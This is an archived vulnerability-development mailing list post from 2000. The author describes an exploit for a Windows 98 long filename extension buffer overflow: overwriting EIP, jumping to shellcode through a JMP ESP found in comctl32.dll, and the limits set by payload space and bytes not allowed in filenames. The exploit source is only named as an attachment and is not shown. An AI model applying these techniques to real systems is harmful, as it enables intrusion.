Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

exploit for W98 long filenameextensions buffer overflow.

From: Laurent.Eschenauer () STUDENT ULG AC BE (Laurent Eschenauer)
Date: Sun, 23 Apr 2000 18:28:08 +0200

Hi all,

I managed to write an exploit for the nasty filename extension buffer overflow.
If you put more bytes in the extensions than in the batch proposed by Zoa
Chien you can overflow such that ESP is actually pointing to your shellcode.
If you don't fill in the buffer enough you need to go upward in the stack
to find a reference to the extension...
- Does that means  we have two differents buffer overflows?

Since we have ESP pointing to our code, we just have to find a JMP ESP
somewhere. I used one in comctl32.dll, but i'm not sure if this one is
static in all win98 release ? 

- Anyone has a list of dll one can use to be sure he has an universal exploit ?
  How do YOU do to check such thing ?

I've just put an "int 3" as code to exec to show that it's possible to use
this baby.
Anyway, it's going to be really tricky to do more since we have only a few
bytes of code (after the smashed EIP at the end of the extension).
A solution would be to check if the other part of the extension is stored
at a fixed place upward in the stack and jump to it, i'll check that later.

One last thing, since we have to create a file with our exploit as
filename, we encounters many "bad bytes" because you can't use everything
you want for a filename. I'll check that later too if i try to make a real
exploit out of this !

I didn't check with other products like Eudora but hey vuln-dev is for
developement no ? So let's get to work to show Microsoft they have a new
BigBug  to handle with ! I'm sure that with a little creativity we can find
many way of remote exploiting this.

You'll find more technical details in the code, where are the bytes that
overwrite the eip, where should be the code, etc...

have fun,

laurent.
------------------------
Laurent eschenauer <laurent.e () mail com>
graduate student in computer engineering
networking and security project
University of Liège, belgium.
------------------------

<HR NOSHADE>
<UL>
<LI>text/plain attachment: longext-exploit.c
</UL>
Previous By Date Next
Previous By Thread Next

Current thread: